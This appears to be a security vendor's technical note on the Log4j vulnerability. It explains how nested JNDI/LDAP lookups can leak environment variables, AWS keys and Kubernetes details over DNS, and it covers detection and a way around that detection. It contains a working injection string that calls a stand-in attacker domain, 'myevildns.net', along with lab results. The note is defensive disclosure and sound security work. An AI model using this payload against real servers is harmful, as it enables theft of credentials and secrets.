Data Exfiltration using the Log4j Vulnerability

Dec 22, 2021 2:25:00 PM

Want to see Spyderbat in action?

We've written before about how Log4j can be exploited using its lookup feature in combination with LDAP to enable remote code execution. Less has been written about other vulnerabilities associated with the lookup feature. Some of these (including the one written about here) cannot be practically blocked using egress filtering.

This technical note describes a new attack vector for Log4j that utilizes DNS for reconnaissance and, in limited cases, data exfiltration of secrets. Especially worrisome is the possibility of stealing AWS API keys for poorly configured services where those keys are present in environment variables.

Background

Log4j offers a built-in substitution language to aid logging. For example, an application programmer might log the string

"Caught exception on Java Runtime ${runtime} on hardware ${hw}"

At the time the message is logged, the variables ${runtime} and ${hw} are substituted in the running Java program, so that the string logged might look like this:

"Caught exception on Java Runtime Java(TM) SE Runtime Environment (build 1.7.0_67-b01) from Oracle Corporation on hardware processors: 4, architecture: amd64-64, instruction sets: amd64"

The Log4J library looks for ${expression} in the string, and substitutes it. The available expressions are documented in the Lookups section of the Log4j reference.

One of the lookups is of the form:

${jndi:provider}

where one of the possible providers is LDAP. Thus, when Log4j receives the string

${jndi:ldap://servername:port/resource}

The log4j library contacts servername on TCP port and asks for information on resource using the LDAP protocol.

Since the substitution language allows nested substitutions, this can be exploited for DNS exfiltration of other information accessible via the Lookup library; For instance, consider what happens when the following string is logged:

${jndi:ldap://${env:USER}.myevildns.net:1389/foobar}

Log4j first does the next substitution of ${env:USER}, which is the value of the USER environment variable, then attempts a DNS lookup of USER.myevildns.net. For example, if the value of USER is tomcat, then the DNS lookup will be for tomcat.myevilsdns.net. The DNS infrastructure will happily route this request to the nameservers for the myevilsdns.net domain, where the data (the value of USER) is harvested. More details on DNS exfiltration can be found in this blog post.

Such an exfiltration is difficult to stop. In practice, you can't just stop your server from contacting DNS. Too many internal processes on the server depend on DNS. DNS filtering on top level domains doesn't help much because the attacker can register new domains more quickly than you can blacklist them.

The lookup library is chock full of interesting data that can be exfiltrated, including:

Environment variables. Lord help you if you have AWS_KEY and AWS_SECRET_KEY set, because then the attacker can access most of your AWS resources programmatically.
Container information: the containerId and imageId tell the attacker that the server is running in a container. That should prompt them to look for Kubernetes information
Kubernetes information: Including the pod id, name, and ip address, the host IP address, and the URL used to access the Kubernetes API server.
Web context information: data from the ServletContext is accessible. For well-known servlets, sensitive information may be accessible, including authentication tokens.

To validate that such exfiltration was possible, we set up a tomcat web application using the vulnerable Log4J library. We also ran tcpdump on the server to capture DNS traffic. Injecting the string

${jndi:ldap://${env:USER}.myevildns.net:1389/foobar}

This resulted in the expected DNS lookup for tomcat.myevildns.net

The following table shows the results of various other attempts:

Log4j sub-expression	Resulting DNS lookup
`${runtime}.foo.com`	Java(TM) SE RuntimeEnvironment (build 1.8.0_20-b26) from Oracle Corporation.foo.com.
`${hw}.foo.com`	processors: 1, architecture: amd64-64.foo.com.
`${env:HOME}.foo.com`	home/tomcat.foo.com.
`${env:SHELL}.foo.com`	bin/bash.foo.com.
`${env:CLASSPATH}.foo.com`	${env:CLASSPATH}.foo.com.

Detection

Since the attacker will not know your environment variables or other configuration parameters, they are likely to attempt substitutions that won't work, like CLASSPATH in the table above. This fact implies that watching for DNS lookups containing the string ${ will have a high probability of detecting this technique, but can be bypassed if the attacker specifies the default parameter using the form ${env:VAR:-default}.

One common solution talked about for organizations that cannot patch Log4J organizations is network egress and ingress filtering. While this approach might prevent RCEs, it still leaves organizations vulnerable to DNS based exfiltration which can be devastating if secrets are kept in environmental variables.

Best practices dictate that secrets should never be stored in environment variables, since they can be accessed by attackers. The technique discussed here is just one of many.

Please use Spyderbat's free tool to scan your system for vulnerable log4j files.